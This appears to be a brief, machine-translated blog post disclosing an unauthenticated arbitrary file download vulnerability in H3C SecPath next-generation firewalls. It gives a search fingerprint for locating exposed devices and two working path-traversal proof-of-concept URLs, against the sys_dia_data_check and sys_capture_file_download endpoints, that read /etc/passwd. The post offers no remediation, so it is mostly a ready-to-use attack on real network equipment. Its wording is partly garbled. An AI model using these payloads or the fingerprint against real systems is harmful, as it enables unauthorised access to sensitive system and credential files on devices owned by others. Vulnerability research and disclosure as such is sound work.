H3c Secpath Next Generation Firewall Sys_dia_data_check Arbitrary File Download Vulnerability
H3c Secpath Next Generation Firewall Sys_dia_data_check Arbitrary File Download Vulnerability
H3C SecPath next-generation firewall sys_dia_data_check arbitrary file download vulnerability
Vulnerability Description
H3C SecPath Next Generation Firewall The existence of feature points leads to arbitrary file download vulnerabilities, and attackers can obtain sensitive information through the vulnerability.
Vulnerability Impact
H3C SecPath
Network surveying and mapping
title=”Web user login”
Vulnerability reappears
The login page is as follows
There are two functions of vulnerability points
Click to download the package to catch the change request
And in the case of unauthentication, you can also request to download sensitive files and verify POC
/webui/?g=sys_dia_data_check&file_name=../../etc/passwd
/webui/?
g=sys_capture_file_download&name=../../../../../../../../etc/passwd
This post is licensed under CC BY 4.0 by the author.